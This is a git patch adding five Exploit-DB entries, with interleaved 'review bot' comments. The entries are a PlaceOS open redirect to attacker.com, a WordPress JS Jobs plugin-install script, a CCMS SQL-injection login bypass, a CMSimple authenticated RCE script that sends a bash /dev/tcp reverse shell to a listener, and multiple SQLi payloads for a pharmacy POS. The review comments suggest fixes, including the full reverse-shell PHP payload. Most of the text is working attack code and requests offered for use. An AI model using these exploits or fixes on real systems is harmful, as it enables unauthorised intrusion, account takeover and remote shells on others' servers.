From f32872547acbdc2e5ab5736463e629703bb62aa9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 1 Oct 2021 05:02:17 +0000
Subject: [PATCH] DB: 2021-10-01
5 changes to exploits/shellcodes
Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation
Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
PlaceOS 1.2109.1 - Open Redirection
---
exploits/multiple/webapps/50359.txt | 18 +++++
exploits/php/webapps/50354.py | 71 ++++++++++++++++++++
exploits/php/webapps/50355.txt | 32 +++++++++
exploits/php/webapps/50356.py | 60 +++++++++++++++++
exploits/php/webapps/50357.txt | 100 ++++++++++++++++++++++++++++
files_exploits.csv | 5 ++
6 files changed, 286 insertions(+)
create mode 100644 exploits/multiple/webapps/50359.txt
create mode 100755 exploits/php/webapps/50354.py
create mode 100644 exploits/php/webapps/50355.txt
create mode 100755 exploits/php/webapps/50356.py
create mode 100644 exploits/php/webapps/50357.txt
diff --git a/exploits/multiple/webapps/50359.txt b/exploits/multiple/webapps/50359.txt
new file mode 100644
index 000000000..a4e30e73a
--- /dev/null
+++ b/exploits/multiple/webapps/50359.txt
@@ -0,0 +1,18 @@
+# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
+# Date: 29-09-2021
+# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
+# Vendor Homepage: https://place.technology/
+# Software Link: https://github.com/PlaceOS
+# Version: < 1.29.10
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-41826
+#
+#
+# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
+# "https://office.example.com/auth/logout?continue=.attacker.com"
+# "https://office.example.com/auth/logout?continue=:password@attacker.com"
+#
+#
+# Reference: https://github.com/PlaceOS/auth/issues/36
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
+# https://nvd.nist.gov/vuln/detail/CVE-2021-41826
\ No newline at end of file
diff --git a/exploits/php/webapps/50354.py b/exploits/php/webapps/50354.py
new file mode 100755
index 000000000..6a912d29d
--- /dev/null
+++ b/exploits/php/webapps/50354.py
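Review bot: The header line `# Version: < 1.29.10` contradicts the title's `PlaceOS 1.2109.1` (PlaceOS uses calendar-style versions, so 1.29.10 looks like a transposition) and leaves a reader unable to tell which builds are affected; align it with the title, e.g. `# Version: 1.2109.1 and earlier`, after confirming against the referenced GitHub issue. The three `continue=` payloads are listed without saying which validation they defeat; a short note such as `# //host is scheme-relative; .host and :pw@host are shaped to slip past a leading-slash / host-suffix check on "continue" (confirm against auth source)` would make the PoC verifiable rather than a bare list. "Austalia" in the author line is a typo for "Australia".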
@@ -0,0 +1,71 @@
+# Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation
+# Google Dork: inurl:/wp-content/plugins/js-jobs/
+# Date: 22/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/js-jobs/
+# Version: <= 1.9.1.4
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+ print("JS Job Manager <= 1.1.7 - Arbitrary Plugin Install/Activation")
+ print("Author -> space_hen (www.github.com/spacehen)")
+
+
+def print_usage():
+ print("Usage: python3 exploit.py [target url] [plugin slug]")
+ print("Ex: python3 exploit.py https://example.com advanced-uploader")
+ print("Note: To activate plugin successfully, main plugin file")
+ print("should match slug, i.e ./plugin-slug/plugin-slug.php")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+
+ if ("Not Allowed!" in raw):
+ return True;
+ else:
+ return False;
+
+def main():
+
+ print_banner()
+ if(len(sys.argv) != 3):
+ print_usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ slug = sys.argv[2]
+
+ ajax_action = 'jsjobs_ajax'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ data = {
+ "task" : "installPluginFromAjax",
+ "jsjobsme" : "jsjobs",
+ "pluginslug" : slug
+ }
+ print("Installing plugin...");
+ response = requests.post(uri, data=data )
+ print("Activating plugin...");
+
+ data = {
+ "task" : "activatePluginFromAjax",
+ "jsjobsme" : "jsjobs",
+ "pluginslug" : slug
+ }
+ response = requests.post(uri, data=data )
+
+main();
\ No newline at end of file
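Review bot: Neither `requests.post` call in `main()` inspects its response, so "Installing plugin..." and "Activating plugin..." are printed even when the target rejects the task and the operator never learns whether the install happened; report each result, e.g. `response = requests.post(uri, data=data, timeout=30)` followed by `print(f"[{response.status_code}] {response.text[:200]}")` after both posts. The header `# Version: <= 1.9.1.4` also contradicts the title and banner (`<= 1.1.7`); one of them is wrong and should be corrected before publication. `vuln_check` returns True on the substring `Not Allowed!` from an unauthenticated GET, which only proves the `jsjobs_ajax` handler answers, not that the install task is reachable without auth — a comment saying so would stop readers treating it as a vulnerability confirmation. The unused `os.path`/`json` imports and the module-level `main();` call with no `if __name__ == "__main__":` guard are style nits.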
@@ -0,0 +1,32 @@
+# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
+# Date: 29-09-2021
+# Exploit Author: sudoninja
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- - and password to ccms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /ccms/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/ccms/
+Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
+Upgrade-Insecure-Requests: 1
+
+username='%20OR%201%20--%20-&password=ccms&login=
\ No newline at end of file
diff --git a/exploits/php/webapps/50356.py b/exploits/php/webapps/50356.py
new file mode 100755
index 000000000..1b9fd0fac
--- /dev/null
+++ b/exploits/php/webapps/50356.py
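Review bot: Step 4 tells the reader to set the password to `ccms`, but in the body `username='%20OR%201%20--%20-&password=ccms&login=` the `-- -` comments out the remainder of the query, so the password value plays no role; say so explicitly (`password can be any value`), otherwise `ccms` reads as a required credential. The write-up never identifies the vulnerable sink — which PHP file builds the login query by concatenating `username` — so the claim cannot be checked against the source; add a line such as `Vulnerable code: <file>, login query concatenates $_POST['username'] unescaped` once confirmed. "Logged in as admin" is presumably because `OR 1` matches the first user row, which is an assumption worth stating. The file credits `sudoninja` while the CSV row added in this same commit lists "Sanjay Singh"; if that is the same person, note the handle in one of the two places, and the environment-specific `Cookie: PHPSESSID=...` header can be dropped from the PoC.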
@@ -0,0 +1,60 @@
+# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
+# Date: 29.09.2021
+# Exploit Author: pussycat0x
+# Vendor Homepage: https://www.cmsimple.org/
+# Version: 5.4
+# Tested on: ubuntu-20.04.1
+
+import argparse
+from bs4 import BeautifulSoup
+from argparse import ArgumentParser
+import requests
+parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
+rparser = parser.add_argument_group('required argument')
+rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
+rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
+rparser.add_argument('-p','--password',type=str,help='', required=True)
+rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
+rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
+args= parser.parse_args()
+#url ='192.168.1.106'
+s = requests.Session()
+
+def main():
+ try:
+
+ url =(args.host)
+ payload = {
+ 'user':args.username,
+ 'passwd':args.password,
+ 'submit': 'Login',
+ 'login':'true',
+ }
+ login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
+ if login.status_code == 200:
+ print('Exploit Completed')
+ else:
+ print("Invalid Credential")
+ cook =(login.cookies.get_dict())
+ temp = s.get(url +'/?file=template&action=edit', cookies=cook)
+ soup = BeautifulSoup(temp.text, 'lxml')
+ csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
+ #& /dev/tcp/10.0.0.10/1234 0>&1'");
+ rev = """& /dev/tcp/"""
+ rev2=(args.lhost)
+ rev3=(args.lport)
+ rev4=""" 0>&1'");"""
+ php =(rev+rev2+'/'+rev3+rev4)
+ revpayload = {
+ 'cmsimpleDataFileStored':'cmsimpleDataFileStored',
+ 'csrf_token':csrfToken,
+ 'text':php,
+ 'file':'template',
+ 'action':'save',
+ }
+ shell = s.post(url +'/',cookies=cook , data=revpayload)
+ exec = s.get(url+'/')
+ exit()
+ except:
+ pass
+main()
\ No newline at end of file
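Review bot: The value written into the template (`php = rev+rev2+'/'+rev3+rev4`) is only the fragment `& /dev/tcp/LHOST/LPORT 0>&1'");` — no `<?php` tag, no `system(`, no `bash -c 'bash -i >` prefix — so as committed nothing executes when `s.get(url+'/')` fetches the page; the commented-out line just above suggests the intended payload was the full `<?php system("bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'"); ?>` (confirm against a working run before publishing). The bare `except: pass` wrapping the whole body also swallows every failure, including the `SystemExit` from `exit()`, so a bad URL, a failed login or a missing `csrf_token` input all end silently; narrow it to `except requests.RequestException as e: print(f"request failed: {e}")` and let other errors surface. `print('Exploit Completed')` fires on any HTTP 200 from the login POST, before the template is even fetched, and the `else` branch continues regardless — test for a logged-in marker in `login.text` and `return` on failure. `exec` shadows a builtin and `exit()` inside the `try` is what the catch-all is hiding.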
diff --git a/exploits/php/webapps/50357.txt b/exploits/php/webapps/50357.txt
new file mode 100644
index 000000000..db2ec5be2
--- /dev/null
+++ b/exploits/php/webapps/50357.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
+# Date: 28.09.2021
+# Exploit Author: Murat
+# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
+# Version: 1.0
+# Tested on: Windows 10
+
+# Pharmacy Point of Sale System v1.0 SQLi
+
+
+GET /pharmacy/view_product.php?id=-1 HTTP/1.1
+Host: localhost
+Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
+Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Connection: close
+
+
+POC:
+https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--
+
+-----------------------------------------------------------------------
+
+#Other parameters with sql injection vulnerability;
+
+
+==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
+
+==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
+
+==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
+
+==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
+
+==> /pharmacy/manage_product.php?id=-1'
+
+==> POST /pharmacy/Actions.php?a=save_stock
+
+------------YWJkMTQzNDcw
+Content-Disposition: 
form-data; name="id"
+
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="supplier_id"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="product_id"
+
+2'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="quantity"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="expiry_date"
+
+
+==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="id"
+
+5'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="product_code"
+
+94102'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="category_id"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="name"
+
+pHqghUme'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="price"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="description"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="status"
+
+0'"
+------------YWJkMTQzNDcw--
+-
\ No newline at end of file
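Review bot: The two multipart PoCs under `==> POST /pharmacy/Actions.php?a=save_stock` and `a=save_product` list form parts delimited by `------------YWJkMTQzNDcw` but give no `Host` and no `Content-Type: multipart/form-data; boundary=...` header (the boundary value is the part delimiter without its leading two dashes), so neither request can be replayed as written; add those headers above the first part. The "Other parameters" section only shows `'"` probe strings with no observed error, row difference or delay, so a reader cannot tell which of `date_from`, `date_to`, `supplier_id`, `product_id`, etc. are actually injectable versus merely tripping a quoting error — record the evidence per parameter (the SQLite error text, or a true/false pair). The opening `GET /pharmacy/view_product.php?id=-1` request carries no payload while the working UNION payload sits on the separate `https://localhost/...` line below it with a different scheme than the `Host: localhost` request; folding the payload into the request would remove the ambiguity. The `id` part of the `save_stock` body is empty and the file ends with a stray `-` line, which look like copy artefacts.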
@@ -44469,3 +44469,8 @@ id,file,description,date,author,type,platform,port
 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
+50354,exploits/php/webapps/50354.py,"Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation",1970-01-01,spacehen,webapps,php,
+50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
+50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
+50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
+50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
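Review bot: All five new rows put `1970-01-01` in the `date` column even though each added file header carries a real date (`22/09/2021`, `29-09-2021`, `28.09.2021`, `29.09.2021`); the three context rows show the same epoch value, so this may be a deliberate placeholder, but if so it should be documented next to the column definition, and otherwise the dates are available to fill in. The `50355` row names `"Sanjay Singh"` while `exploits/php/webapps/50355.txt` credits `sudoninja`; the index and the file should agree on one form (or carry both, e.g. `"Sanjay Singh (sudoninja)"`). The `50354` row's title says `1.1.7` while that file's `# Version:` header says `<= 1.9.1.4`, so whichever is corrected in the file should be mirrored here.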